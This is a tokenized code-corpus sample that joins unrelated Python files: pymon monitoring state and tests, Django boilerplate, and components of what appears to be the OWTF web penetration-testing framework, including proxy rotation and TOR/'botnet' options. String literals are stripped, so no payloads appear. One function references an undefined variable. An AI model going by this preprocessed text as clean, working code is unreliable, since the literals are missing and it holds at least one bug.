return self . data . items ( ) <EOL> class MonitorState ( BaseState ) : <EOL> '''<STR_LIT>''' <EOL> implements ( IState ) <EOL> def __init__ ( self , monitor ) : <EOL> self . monitor = monitor <EOL> BaseState . __init__ ( self , data = InitialCheckData ( ) ) <EOL> self . setFilename ( ) <EOL> self . workflow = ServiceState ( stateWorkflow ) <EOL> def setFilename ( self , filename = None ) : <EOL> backupDir = self . monitor . cfg . app . admin . backups . state_dir <EOL> if not filename : <EOL> filename = self . monitor . uid <EOL> self . filename = os . path . join ( backupDir , <EOL> re . sub ( '<STR_LIT>' , '<STR_LIT:_>' , filename ) ) <EOL> self . data . filename = self . filename <EOL> log . debug ( "<STR_LIT>" % self . filename ) <EOL> def setNonChangingState ( state , stateNum , uid ) : <EOL> stateName = cfg . getStateNameFromNumber ( stateNum ) <EOL> type = utils . getFriendlyTypeFromURI ( uid ) <EOL> host = utils . getHostFromURI ( uid ) <EOL> org = cfg . getCheckConfigFromURI ( uid ) . org <EOL> state . set ( '<STR_LIT>' , stateNum ) <EOL> state . set ( '<STR_LIT>' , stateName ) <EOL> state . set ( '<STR_LIT>' + stateName , <NUM_LIT:1> ) <EOL> state . set ( '<STR_LIT>' , host ) <EOL> state . set ( '<STR_LIT>' , type ) <EOL> if org : <EOL> state . set ( '<STR_LIT>' , org ) <EOL> return state <EOL> class History ( Queue , object ) : <EOL> '''<STR_LIT>''' <EOL> def setattr ( self , aName , aValue ) : <EOL> self . __setattr__ ( aName , aValue ) <EOL> def getattr ( self , aName ) : <EOL> return self . __getattribute__ ( aName ) <EOL> def setLastRemoved ( self , aItem ) : <EOL> self . setattr ( '<STR_LIT>' , aItem ) <EOL> def getLastRemoved ( self ) : <EOL> return self . getattr ( '<STR_LIT>' ) <EOL> def add ( self , aItem ) : <EOL> try : <EOL> self . put_nowait ( aItem ) <EOL> except : <EOL> self . removeItem ( ) <EOL> self . add ( aItem ) <EOL> def removeItem ( self ) : <EOL> self . setLastRemoved ( self . get ( ) ) <EOL> globalRegistry = Registry ( ) <EOL> state = BaseState ( ) <EOL> history = History ( ) <EOL> factories = { } <EOL> app_state = os . path . join ( cfg . admin . backups . state_dir , <EOL> cfg . admin . backups . application_state ) <EOL> state . setFilename ( app_state ) <EOL> try : <EOL> state . restore ( ) <EOL> log . info ( "<STR_LIT>" ) <EOL> except IOError : <EOL> state . save ( ) <EOL> globalRegistry . add ( '<STR_LIT:state>' , state ) <EOL> globalRegistry . add ( '<STR_LIT>' , history ) <EOL> globalRegistry . add ( '<STR_LIT>' , factories ) <EOL> def _test ( ) : <EOL> import doctest , application <EOL> doctest . testmod ( application ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> _test ( ) </s>
<s> """<STR_LIT>""" <EOL> import os <EOL> from datetime import datetime <EOL> from twisted . trial . unittest import TestCase <EOL> from twisted . internet . defer import DeferredList <EOL> from pymon . storage import api <EOL> class DatabaseSetupTestCase ( TestCase ) : <EOL> """<STR_LIT>""" <EOL> def setUp ( self ) : <EOL> """<STR_LIT>""" <EOL> self . filename = self . mktemp ( ) <EOL> def test_connectionSchema ( self ) : <EOL> db = api . getDatabase ( "<STR_LIT>" ) <EOL> class DatabaseAPITestCase ( TestCase ) : <EOL> """<STR_LIT:U+0020>""" <EOL> def setUp ( self ) : <EOL> """<STR_LIT>""" <EOL> self . filename = self . mktemp ( ) <EOL> self . database = api . getDatabase ( "<STR_LIT>" + self . filename ) <EOL> self . host = u'<STR_LIT>' <EOL> self . service = u'<STR_LIT>' <EOL> self . events = [ u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT:error>' ] <EOL> self . conn = self . database . connect ( ) <EOL> def createHostStatus ( self ) : <EOL> stat = Status ( ) <EOL> stat . host = self . host <EOL> stat . service = self . service <EOL> stat . ok_count = <NUM_LIT:0> <EOL> return self . store . add ( stat ) <EOL> def createHostEvent ( self , transition , datetime ) : <EOL> event = Event ( ) <EOL> event . host = self . host <EOL> event . service = self . service <EOL> event . transition = transition <EOL> event . datetime = datetime <EOL> return self . store . add ( event ) <EOL> def queryHostStatus ( self , result , host = None ) : <EOL> if not host : <EOL> host = self . host <EOL> return self . store . find ( Status , Status . host == host ) <EOL> def cbGetOneResult ( self , results ) : <EOL> return results . one ( ) <EOL> def cbGetAllResults ( self , results ) : <EOL> results . order_by ( Event . datetime ) <EOL> return results . get_all ( ) <EOL> def tearDown ( self ) : <EOL> """<STR_LIT>""" <EOL> os . remove ( self . filename ) <EOL> return self . store . stop ( ) <EOL> def test_addStatus ( self ) : <EOL> """<STR_LIT>""" <EOL> def cbCheck ( result ) : <EOL> self . assertEquals ( result . host , self . host ) <EOL> self . assertEquals ( result . service , self . service ) <EOL> return result <EOL> d = self . createHostStatus ( ) <EOL> d . addCallback ( self . queryHostStatus ) <EOL> d . addCallback ( self . cbGetOneResult ) <EOL> d . addCallback ( cbCheck ) <EOL> return d <EOL> def test_incrementCount ( self ) : <EOL> """<STR_LIT>""" <EOL> def cbSetCount ( stat ) : <EOL> stat . ok_count += <NUM_LIT:1> <EOL> return self . store . commit ( ) <EOL> def cbCheckIncrement ( stat ) : <EOL> self . assertEquals ( stat . ok_count , <NUM_LIT:1> ) <EOL> return stat <EOL> d = self . createHostStatus ( ) <EOL> d . addCallback ( self . queryHostStatus ) <EOL> d . addCallback ( self . cbGetOneResult ) <EOL> d . addCallback ( cbSetCount ) <EOL> d . addCallback ( self . queryHostStatus ) <EOL> d . addCallback ( self . cbGetOneResult ) <EOL> d . addCallback ( cbCheckIncrement ) <EOL> return d <EOL> def test_addEvent ( self ) : <EOL> """<STR_LIT>""" <EOL> def cbQueryEvent ( ign ) : <EOL> d = self . store . find ( Event ) <EOL> d . addCallback ( self . cbGetAllResults ) <EOL> return d <EOL> def cbCheckEvent ( events ) : <EOL> expected = self . events <EOL> received = [ x . transition for x in events ] <EOL> self . assertEqual ( expected , received ) <EOL> def createEvents ( ) : <EOL> dl = [ ] <EOL> for event in self . events : <EOL> dl . append ( self . createHostEvent ( event , datetime . now ( ) ) ) <EOL> return DeferredList ( dl ) <EOL> d = createEvents ( ) <EOL> d . addCallback ( cbQueryEvent ) <EOL> d . addCallback ( cbCheckEvent ) <EOL> return d </s>
<s> import os <EOL> import sys <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> os . environ . setdefault ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> from django . core . management import execute_from_command_line <EOL> execute_from_command_line ( sys . argv ) </s>
<s> import re <EOL> import os <EOL> import pyservice <EOL> from setuptools import setup <EOL> setup ( <EOL> name = "<STR_LIT>" , <EOL> version = pyservice . __version__ , <EOL> author = re . sub ( r'<STR_LIT>' , r'<STR_LIT>' , pyservice . __author__ ) , <EOL> author_email = re . sub ( r'<STR_LIT>' , r'<STR_LIT>' , pyservice . __author__ ) , <EOL> url = '<STR_LIT>' , <EOL> description = ( "<STR_LIT>" ) , <EOL> long_description = open ( '<STR_LIT>' ) . read ( ) , <EOL> license = "<STR_LIT>" , <EOL> keywords = "<STR_LIT>" , <EOL> py_modules = [ '<STR_LIT>' ] , <EOL> classifiers = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] , <EOL> entry_points = { <EOL> '<STR_LIT>' : [ '<STR_LIT>' ] } , <EOL> ) </s>
<s> from __future__ import unicode_literals <EOL> from django . db import models , migrations <EOL> import history . models <EOL> class Migration ( migrations . Migration ) : <EOL> dependencies = [ <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] <EOL> operations = [ <EOL> migrations . CreateModel ( <EOL> name = '<STR_LIT>' , <EOL> fields = [ <EOL> ( '<STR_LIT:id>' , models . AutoField ( verbose_name = '<STR_LIT>' , serialize = False , auto_created = True , primary_key = True ) ) , <EOL> ( '<STR_LIT>' , models . DateTimeField ( default = history . models . get_time ) ) , <EOL> ( '<STR_LIT>' , models . DateTimeField ( default = history . models . get_time ) ) , <EOL> ( '<STR_LIT>' , models . CharField ( max_length = <NUM_LIT:30> , db_index = True ) ) , <EOL> ( '<STR_LIT>' , models . CharField ( max_length = <NUM_LIT:100> ) ) , <EOL> ( '<STR_LIT>' , models . BigIntegerField ( default = <NUM_LIT:0> ) ) , <EOL> ( '<STR_LIT>' , models . CharField ( max_length = <NUM_LIT:30> , db_index = True ) ) , <EOL> ( '<STR_LIT:text>' , models . TextField ( ) ) , <EOL> ] , <EOL> options = { <EOL> '<STR_LIT>' : False , <EOL> } , <EOL> ) , <EOL> ] </s>
<s> '''<STR_LIT>''' <EOL> from framework . db import models <EOL> from framework . dependency_management . dependency_resolver import BaseComponent <EOL> from framework . dependency_management . interfaces import DBErrorInterface <EOL> from framework . lib . exceptions import InvalidErrorReference <EOL> class ErrorDB ( BaseComponent , DBErrorInterface ) : <EOL> COMPONENT_NAME = "<STR_LIT>" <EOL> def __init__ ( self ) : <EOL> self . register_in_service_locator ( ) <EOL> self . db = self . get_component ( "<STR_LIT>" ) <EOL> self . config = self . get_component ( "<STR_LIT>" ) <EOL> def Add ( self , Message , Trace ) : <EOL> error = models . Error ( <EOL> owtf_message = Message , <EOL> traceback = Trace ) <EOL> self . db . session . add ( error ) <EOL> self . db . session . commit ( ) <EOL> def Delete ( self , error_id ) : <EOL> error = self . db . session . query ( models . Error ) . get ( error_id ) <EOL> if error : <EOL> self . db . session . delete ( error ) <EOL> self . db . session . commit ( ) <EOL> else : <EOL> raise InvalidErrorReference ( <EOL> "<STR_LIT>" + str ( error_id ) ) <EOL> def GenerateQueryUsingSession ( self , criteria ) : <EOL> query = self . db . session . query ( models . Error ) <EOL> if criteria . get ( '<STR_LIT>' , None ) : <EOL> if isinstance ( criteria . get ( '<STR_LIT>' ) , list ) : <EOL> criteria [ '<STR_LIT>' ] = criteria [ '<STR_LIT>' ] [ <NUM_LIT:0> ] <EOL> query = query . filter_by ( <EOL> reported = self . config . ConvertStrToBool ( <EOL> criteria [ '<STR_LIT>' ] ) ) <EOL> return ( query ) <EOL> def Update ( self , error_id , user_message ) : <EOL> error = self . db . session . query ( models . Error ) . get ( error_id ) <EOL> if not error : <EOL> raise InvalidErrorReference ( <EOL> "<STR_LIT>" + str ( error_id ) ) <EOL> error . user_message = patch_data [ "<STR_LIT>" ] <EOL> self . db . session . merge ( error ) <EOL> self . db . session . commit ( ) <EOL> def DeriveErrorDict ( self , error_obj ) : <EOL> tdict = dict ( error_obj . __dict__ ) <EOL> tdict . pop ( "<STR_LIT>" , None ) <EOL> return ( tdict ) <EOL> def DeriveErrorDicts ( self , error_obj_list ) : <EOL> results = [ ] <EOL> for error_obj in error_obj_list : <EOL> if error_obj : <EOL> results . append ( self . DeriveErrorDict ( error_obj ) ) <EOL> return results <EOL> def GetAll ( self , criteria = None ) : <EOL> if not criteria : <EOL> criteria = { } <EOL> query = self . GenerateQueryUsingSession ( criteria ) <EOL> results = query . all ( ) <EOL> return ( self . DeriveErrorDicts ( results ) ) <EOL> def Get ( self , error_id ) : <EOL> error = self . db . session . query ( models . Error ) . get ( error_id ) <EOL> if not error : <EOL> raise InvalidErrorReference ( <EOL> "<STR_LIT>" + str ( error_id ) ) <EOL> return ( self . DeriveErrorDict ( error ) ) </s>
<s> '''<STR_LIT>''' <EOL> import tornado . curl_httpclient <EOL> from tornado . httpclient import HTTPRequest <EOL> import os <EOL> from tornado . ioloop import IOLoop <EOL> from tornado import gen <EOL> from framework . dependency_management . dependency_resolver import BaseComponent <EOL> import logging <EOL> class Proxy_manager ( BaseComponent ) : <EOL> COMPONENT_NAME = "<STR_LIT>" <EOL> testing_url = "<STR_LIT>" <EOL> testing_url_patern = "<STR_LIT>" <EOL> def __init__ ( self ) : <EOL> self . register_in_service_locator ( ) <EOL> self . testing_url = "<STR_LIT>" <EOL> self . proxies = [ ] <EOL> self . number_of_proxies = <NUM_LIT:0> <EOL> self . proxy_pointer = <NUM_LIT:0> <EOL> self . number_of_responses = <NUM_LIT:0> <EOL> def load_proxy_list ( self , proxylist_path ) : <EOL> file_handle = open ( os . path . expanduser ( proxylist_path ) , "<STR_LIT:r>" ) <EOL> proxies = [ ] <EOL> file_buf = file_handle . read ( ) <EOL> lines = file_buf . split ( "<STR_LIT:\n>" ) <EOL> for line in lines : <EOL> if str ( line ) . strip ( ) != "<STR_LIT>" : <EOL> proxies . append ( line . split ( "<STR_LIT::>" ) ) <EOL> logging . info ( "<STR_LIT>" ) <EOL> return proxies <EOL> def get_next_available_proxy ( self ) : <EOL> if self . proxy_pointer == ( self . number_of_proxies - <NUM_LIT:1> ) : <EOL> self . proxy_pointer = <NUM_LIT:0> <EOL> else : <EOL> self . proxy_pointer = self . proxy_pointer + <NUM_LIT:1> <EOL> proxy = self . proxies [ self . proxy_pointer ] <EOL> return { "<STR_LIT>" : proxy , "<STR_LIT:index>" : self . proxy_pointer } <EOL> def remove_current_proxy ( self , index ) : <EOL> del self . proxies [ index ] <EOL> self . number_of_proxies -= <NUM_LIT:1> <EOL> class Proxy_Checker ( ) : <EOL> Proxies = [ ] <EOL> number_of_responses = <NUM_LIT:0> <EOL> working_proxies = <NUM_LIT:0> <EOL> @ staticmethod <EOL> def check_proxies ( q , proxies ) : <EOL> Proxy_Checker . number_of_responses = <NUM_LIT:0> <EOL> Proxy_Checker . number_of_unchecked_proxies = len ( proxies ) <EOL> for i in range ( <NUM_LIT:0> , Proxy_Checker . number_of_unchecked_proxies ) : <EOL> IOLoop . instance ( ) . add_callback ( Proxy_Checker . handle_proxy_status , proxies [ i ] , i ) <EOL> IOLoop . instance ( ) . start ( ) <EOL> q . put ( Proxy_Checker . Proxies ) <EOL> @ staticmethod <EOL> @ gen . engine <EOL> def handle_proxy_status ( proxy , i ) : <EOL> request = HTTPRequest ( url = Proxy_manager . testing_url , <EOL> proxy_host = proxy [ <NUM_LIT:0> ] , <EOL> proxy_port = int ( proxy [ <NUM_LIT:1> ] ) , <EOL> validate_cert = False <EOL> ) <EOL> http_client = tornado . curl_httpclient . CurlAsyncHTTPClient ( ) <EOL> response = yield gen . Task ( http_client . fetch , request ) <EOL> if response . code == <NUM_LIT:200> and response . body . find ( Proxy_manager . testing_url_patern ) != - <NUM_LIT:1> : <EOL> Proxy_Checker . Proxies . append ( proxy ) <EOL> Proxy_Checker . working_proxies += <NUM_LIT:1> <EOL> Proxy_Checker . number_of_responses += <NUM_LIT:1> <EOL> logging . info ( "<STR_LIT>" + str ( Proxy_Checker . number_of_responses ) + "<STR_LIT:/>" + str ( Proxy_Checker . number_of_unchecked_proxies ) + "<STR_LIT>" + str ( Proxy_Checker . working_proxies ) + "<STR_LIT>" ) <EOL> if Proxy_Checker . number_of_responses == Proxy_Checker . number_of_unchecked_proxies : <EOL> IOLoop . instance ( ) . stop ( ) <EOL> logging . info ( "<STR_LIT>" ) </s>
<s> """<STR_LIT>""" <EOL> class FrameworkException ( Exception ) : <EOL> def __init__ ( self , value ) : <EOL> self . parameter = value <EOL> def __str__ ( self ) : <EOL> return repr ( self . parameter ) <EOL> class FrameworkAbortException ( FrameworkException ) : <EOL> pass <EOL> class PluginAbortException ( FrameworkException ) : <EOL> pass <EOL> class UnreachableTargetException ( FrameworkException ) : <EOL> pass <EOL> class UnresolvableTargetException ( FrameworkException ) : <EOL> pass <EOL> class DBIntegrityException ( FrameworkException ) : <EOL> pass <EOL> class InvalidTargetReference ( FrameworkException ) : <EOL> pass <EOL> class InvalidSessionReference ( FrameworkException ) : <EOL> pass <EOL> class InvalidTransactionReference ( FrameworkException ) : <EOL> pass <EOL> class InvalidParameterType ( FrameworkException ) : <EOL> pass <EOL> class InvalidWorkerReference ( FrameworkException ) : <EOL> pass <EOL> class InvalidErrorReference ( FrameworkException ) : <EOL> pass <EOL> class InvalidWorkReference ( FrameworkException ) : <EOL> pass <EOL> class InvalidConfigurationReference ( FrameworkException ) : <EOL> pass <EOL> class InvalidUrlReference ( FrameworkException ) : <EOL> pass <EOL> class InvalidActionReference ( FrameworkException ) : <EOL> pass <EOL> class InvalidMessageReference ( FrameworkException ) : <EOL> pass <EOL> class InvalidMappingReference ( FrameworkException ) : <EOL> pass </s>
<s> """<STR_LIT>""" <EOL> from __future__ import print_function <EOL> import os <EOL> import sys <EOL> import logging <EOL> from framework . dependency_check import verify_dependencies <EOL> verify_dependencies ( os . path . dirname ( os . path . abspath ( sys . argv [ <NUM_LIT:0> ] ) ) or '<STR_LIT:.>' ) <EOL> from framework . core import Core <EOL> from framework . dependency_management . component_initialiser import ComponentInitialiser , DatabaseNotRunningException <EOL> from framework . dependency_management . dependency_resolver import ServiceLocator <EOL> from framework import update <EOL> from framework . lib . cli_options import usage , parse_options , parse_update_options <EOL> def banner ( ) : <EOL> print ( """<STR_LIT>""" ) <EOL> def get_plugins_from_arg ( arg ) : <EOL> plugins = arg . split ( '<STR_LIT:U+002C>' ) <EOL> plugin_groups = ServiceLocator . get_component ( "<STR_LIT>" ) . GetGroupsForPlugins ( plugins ) <EOL> if len ( plugin_groups ) > <NUM_LIT:1> : <EOL> usage ( <EOL> "<STR_LIT>" + <EOL> str ( plugin_groups ) + "<STR_LIT:'>" ) <EOL> return [ plugins , plugin_groups ] <EOL> def process_options ( user_args ) : <EOL> try : <EOL> db_plugin = ServiceLocator . get_component ( "<STR_LIT>" ) <EOL> valid_groups = db_plugin . GetAllGroups ( ) <EOL> valid_types = db_plugin . GetAllTypes ( ) + [ '<STR_LIT:all>' , '<STR_LIT>' ] <EOL> arg = parse_options ( user_args , valid_groups , valid_types ) <EOL> except KeyboardInterrupt as e : <EOL> usage ( "<STR_LIT>" + e ) <EOL> profiles = { } <EOL> plugin_group = arg . PluginGroup <EOL> if arg . CustomProfile : <EOL> for profile in arg . CustomProfile . split ( '<STR_LIT:U+002C>' ) : <EOL> chunks = profile . split ( '<STR_LIT::>' ) <EOL> if len ( chunks ) != <NUM_LIT:2> or not os . path . exists ( chunks [ <NUM_LIT:1> ] ) : <EOL> usage ( "<STR_LIT>" ) <EOL> else : <EOL> profiles [ chunks [ <NUM_LIT:0> ] ] = chunks [ <NUM_LIT:1> ] <EOL> if arg . OnlyPlugins : <EOL> arg . OnlyPlugins , plugin_groups = get_plugins_from_arg ( arg . OnlyPlugins ) <EOL> try : <EOL> plugin_group = plugin_groups [ <NUM_LIT:0> ] <EOL> except IndexError : <EOL> usage ( "<STR_LIT>" ) <EOL> logging . info ( <EOL> "<STR_LIT>" + <EOL> plugin_group + "<STR_LIT>" ) <EOL> if arg . ExceptPlugins : <EOL> arg . ExceptPlugins , plugin_groups = get_plugins_from_arg ( arg . ExceptPlugins ) <EOL> if arg . TOR_mode : <EOL> arg . TOR_mode = arg . TOR_mode . split ( "<STR_LIT::>" ) <EOL> if ( arg . TOR_mode [ <NUM_LIT:0> ] == "<STR_LIT>" ) : <EOL> from framework . http . proxy . tor_manager import TOR_manager <EOL> TOR_manager . msg_configure_tor ( ) <EOL> exit ( <NUM_LIT:0> ) <EOL> if len ( arg . TOR_mode ) == <NUM_LIT:1> : <EOL> if arg . TOR_mode [ <NUM_LIT:0> ] != "<STR_LIT>" : <EOL> usage ( "<STR_LIT>" ) <EOL> elif len ( arg . TOR_mode ) != <NUM_LIT:5> : <EOL> usage ( "<STR_LIT>" ) <EOL> else : <EOL> if arg . TOR_mode [ <NUM_LIT:0> ] == '<STR_LIT>' : <EOL> outbound_proxy_ip = "<STR_LIT:127.0.0.1>" <EOL> else : <EOL> outbound_proxy_ip = arg . TOR_mode [ <NUM_LIT:0> ] <EOL> if arg . TOR_mode [ <NUM_LIT:1> ] == '<STR_LIT>' : <EOL> outbound_proxy_port = "<STR_LIT>" <EOL> else : <EOL> outbound_proxy_port = arg . TOR_mode [ <NUM_LIT:1> ] <EOL> arg . OutboundProxy = "<STR_LIT>" + outbound_proxy_ip + "<STR_LIT::>" + outbound_proxy_port <EOL> if arg . Botnet_mode : <EOL> arg . Botnet_mode = arg . Botnet_mode . split ( "<STR_LIT::>" ) <EOL> if arg . Botnet_mode [ <NUM_LIT:0> ] == "<STR_LIT>" and len ( arg . Botnet_mode ) != <NUM_LIT:1> : <EOL> usage ( "<STR_LIT>" ) <EOL> if arg . Botnet_mode [ <NUM_LIT:0> ] == "<STR_LIT:list>" : <EOL> if len ( arg . Botnet_mode ) != <NUM_LIT:2> : <EOL> usage ( "<STR_LIT>" ) <EOL> if not os . path . isfile ( os . path . expanduser ( arg . Botnet_mode [ <NUM_LIT:1> ] ) ) : <EOL> usage ( "<STR_LIT>" ) <EOL> if arg . OutboundProxy : <EOL> arg . OutboundProxy = arg . OutboundProxy . split ( '<STR_LIT>' ) <EOL> if len ( arg . OutboundProxy ) == <NUM_LIT:2> : <EOL> arg . OutboundProxy = arg . OutboundProxy + arg . OutboundProxy . pop ( ) . split ( '<STR_LIT::>' ) <EOL> if arg . OutboundProxy [ <NUM_LIT:0> ] not in [ "<STR_LIT>" , "<STR_LIT:http>" ] : <EOL> usage ( "<STR_LIT>" ) <EOL> else : <EOL> arg . OutboundProxy = arg . OutboundProxy . pop ( ) . split ( '<STR_LIT::>' ) <EOL> if ( len ( arg . OutboundProxy ) not in [ <NUM_LIT:2> , <NUM_LIT:3> ] ) : <EOL> usage ( "<STR_LIT>" ) <EOL> else : <EOL> try : <EOL> int ( arg . OutboundProxy [ - <NUM_LIT:1> ] ) <EOL> except ValueError : <EOL> usage ( "<STR_LIT>" ) <EOL> if arg . InboundProxy : <EOL> arg . InboundProxy = arg . InboundProxy . split ( '<STR_LIT::>' ) <EOL> if len ( arg . InboundProxy ) not in [ <NUM_LIT:1> , <NUM_LIT:2> ] : <EOL> usage ( "<STR_LIT>" ) <EOL> else : <EOL> try : <EOL> int ( arg . InboundProxy [ - <NUM_LIT:1> ] ) <EOL> except ValueError : <EOL> usage ( "<STR_LIT>" ) <EOL> plugin_types_for_group = db_plugin . GetTypesForGroup ( plugin_group ) <EOL> if arg . PluginType == '<STR_LIT:all>' : <EOL> arg . PluginType = plugin_types_for_group <EOL> elif arg . PluginType == '<STR_LIT>' : <EOL> arg . PluginType = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> scope = arg . Targets or [ ] <EOL> num_targets = len ( scope ) <EOL> if plugin_group != '<STR_LIT>' and num_targets == <NUM_LIT:0> and not arg . list_plugins : <EOL> pass <EOL> elif num_targets == <NUM_LIT:1> : <EOL> if os . path . isfile ( scope [ <NUM_LIT:0> ] ) : <EOL> logging . info ( "<STR_LIT>" ) <EOL> new_scope = [ ] <EOL> for target in open ( scope [ <NUM_LIT:0> ] ) . read ( ) . split ( "<STR_LIT:\n>" ) : <EOL> CleanTarget = target . strip ( ) <EOL> if not CleanTarget : <EOL> continue <EOL> new_scope . append ( CleanTarget ) <EOL> if len ( new_scope ) == <NUM_LIT:0> : <EOL> usage ( "<STR_LIT>" ) <EOL> scope = new_scope <EOL> for target in scope : <EOL> if target [ <NUM_LIT:0> ] == "<STR_LIT:->" : <EOL> usage ( "<STR_LIT>" + target ) <EOL> args = '<STR_LIT>' <EOL> if plugin_group == '<STR_LIT>' : <EOL> args = scope <EOL> scope = [ '<STR_LIT>' ] <EOL> return { <EOL> '<STR_LIT>' : arg . list_plugins , <EOL> '<STR_LIT>' : arg . ForceOverwrite , <EOL> '<STR_LIT>' : arg . Interactive == '<STR_LIT:yes>' , <EOL> '<STR_LIT>' : arg . Simulation , <EOL> '<STR_LIT>' : scope , <EOL> '<STR_LIT>' : sys . argv , <EOL> '<STR_LIT>' : arg . PluginType , <EOL> '<STR_LIT>' : arg . OnlyPlugins , <EOL> '<STR_LIT>' : arg . ExceptPlugins , <EOL> '<STR_LIT>' : arg . InboundProxy , <EOL> '<STR_LIT>' : arg . OutboundProxy , <EOL> '<STR_LIT>' : arg . OutboundProxyAuth , <EOL> '<STR_LIT>' : profiles , <EOL> '<STR_LIT>' : plugin_group , <EOL> '<STR_LIT>' : arg . RPort , <EOL> '<STR_LIT>' : arg . PortWaves , <EOL> '<STR_LIT>' : arg . ProxyMode , <EOL> '<STR_LIT>' : arg . TOR_mode , <EOL> '<STR_LIT>' : arg . Botnet_mode , <EOL> '<STR_LIT>' : arg . nowebui , <EOL> '<STR_LIT>' : args } <EOL> def run_owtf ( core , args ) : <EOL> try : <EOL> if core . start ( args ) : <EOL> core . finish ( ) <EOL> except KeyboardInterrupt : <EOL> logging . warning ( "<STR_LIT>" ) <EOL> logging . info ( "<STR_LIT>" ) <EOL> core . finish ( ) <EOL> except SystemExit : <EOL> pass <EOL> finally : <EOL> core . clean_temp_storage_dirs ( ) <EOL> def main ( args ) : <EOL> banner ( ) <EOL> root_dir = os . path . dirname ( os . path . abspath ( args [ <NUM_LIT:0> ] ) ) or '<STR_LIT:.>' <EOL> owtf_pid = os . getpid ( ) <EOL> if not "<STR_LIT>" in args [ <NUM_LIT:1> : ] : <EOL> try : <EOL> ComponentInitialiser . initialisation_phase_1 ( root_dir , owtf_pid ) <EOL> except DatabaseNotRunningException : <EOL> exit ( - <NUM_LIT:1> ) <EOL> args = process_options ( args [ <NUM_LIT:1> : ] ) <EOL> ComponentInitialiser . initialisation_phase_2 ( args ) <EOL> core = Core ( ) <EOL> logging . warn ( <EOL> "<STR_LIT>" % ( <EOL> ServiceLocator . get_component ( "<STR_LIT>" ) . FrameworkConfigGet ( '<STR_LIT>' ) , <EOL> ServiceLocator . get_component ( "<STR_LIT>" ) . FrameworkConfigGet ( '<STR_LIT>' ) ) <EOL> ) <EOL> run_owtf ( core , args ) <EOL> else : <EOL> try : <EOL> arg = parse_update_options ( args [ <NUM_LIT:1> : ] ) <EOL> except Exception as e : <EOL> usage ( "<STR_LIT>" + e ) <EOL> updater = update . Updater ( root_dir ) <EOL> if arg . OutboundProxy : <EOL> if arg . OutboundProxyAuth : <EOL> updater . set_proxy ( <EOL> arg . OutboundProxy , <EOL> proxy_auth = arg . OutboundProxyAuth ) <EOL> else : <EOL> updater . set_proxy ( arg . OutboundProxy ) <EOL> updater . update ( ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> main ( sys . argv ) </s>
<s> from framework . dependency_management . dependency_resolver import ServiceLocator <EOL> """<STR_LIT>""" <EOL> DESCRIPTION = "<STR_LIT>" <EOL> def run ( PluginInfo ) : <EOL> return ServiceLocator . get_component ( "<STR_LIT>" ) . CommandDump ( '<STR_LIT>' , '<STR_LIT>' , ServiceLocator . get_component ( "<STR_LIT>" ) . GetResources ( '<STR_LIT>' ) , PluginInfo , [ ] ) </s>
<s> from framework . dependency_management . dependency_resolver import ServiceLocator <EOL> """<STR_LIT>""" <EOL> import string , re <EOL> import cgi <EOL> DESCRIPTION = "<STR_LIT>" <EOL> def run ( PluginInfo ) : <EOL> plugin_helper = ServiceLocator . get_component ( "<STR_LIT>" ) <EOL> Content = plugin_helper . VulnerabilitySearchBox ( '<STR_LIT>' ) <EOL> Content += plugin_helper . ResourceLinkList ( '<STR_LIT>' , ServiceLocator . get_component ( "<STR_LIT>" ) . GetResources ( '<STR_LIT>' ) ) <EOL> return Content </s>
<s> from framework . dependency_management . dependency_resolver import ServiceLocator <EOL> """<STR_LIT>""" <EOL> DESCRIPTION = "<STR_LIT>" <EOL> def run ( PluginInfo ) : <EOL> return ServiceLocator . get_component ( "<STR_LIT>" ) . ResourceLinkList ( '<STR_LIT>' , ServiceLocator . get_component ( "<STR_LIT>" ) . GetResources ( '<STR_LIT>' ) ) </s>
<s> from tests . testing_framework . base_test_cases import BaseTestCase <EOL> from hamcrest import * <EOL> from flexmock import flexmock <EOL> from framework . db . command_register import CommandRegister <EOL> class CommandRegisterTests ( BaseTestCase ) : <EOL> def before ( self ) : <EOL> self . core_mock = flexmock ( ) <EOL> def test_Add_should_save_a_command_through_a_core_call ( self ) : <EOL> self . _mock_db_method_once ( "<STR_LIT>" ) <EOL> command_register = self . _create_command_register_with_core_mock ( ) <EOL> command_register . Add ( self . _create_command_dictionary ( ) ) <EOL> def test_Search_should_use_a_core_call ( self ) : <EOL> self . _mock_db_method_once ( "<STR_LIT>" ) <EOL> command_register = self . _create_command_register_with_core_mock ( ) <EOL> command_register . Search ( "<STR_LIT>" ) <EOL> def test_AlreadyRegistered_should_return_False_for_not_registered_commands ( self ) : <EOL> command_register = self . _create_command_register_with_core_mock ( ) <EOL> flexmock ( command_register ) <EOL> command_register . should_receive ( "<STR_LIT>" ) . and_return ( [ ] ) . once ( ) <EOL> registered = command_register . AlreadyRegistered ( "<STR_LIT>" ) <EOL> assert_that ( registered , is_ ( False ) ) <EOL> def test_AlreadyRegistered_should_return_non_False_for_registered_commands ( self ) : <EOL> command_register = self . _create_command_register_with_core_mock ( ) <EOL> flexmock ( command_register ) <EOL> command_register . should_receive ( "<STR_LIT>" ) . and_return ( [ { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:target>' } ] ) . once ( ) <EOL> registered = command_register . AlreadyRegistered ( "<STR_LIT>" ) <EOL> assert_that ( registered , is_not ( False ) ) <EOL> assert_that ( registered is not None ) <EOL> def _mock_db_method_once ( self , method ) : <EOL> db_mock = flexmock ( ) <EOL> db_mock . should_receive ( method ) . once ( ) <EOL> self . core_mock . DB = db_mock <EOL> def _create_command_register_with_core_mock ( self ) : <EOL> return CommandRegister ( self . core_mock ) <EOL> def _create_command_dictionary ( self ) : <EOL> return { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } 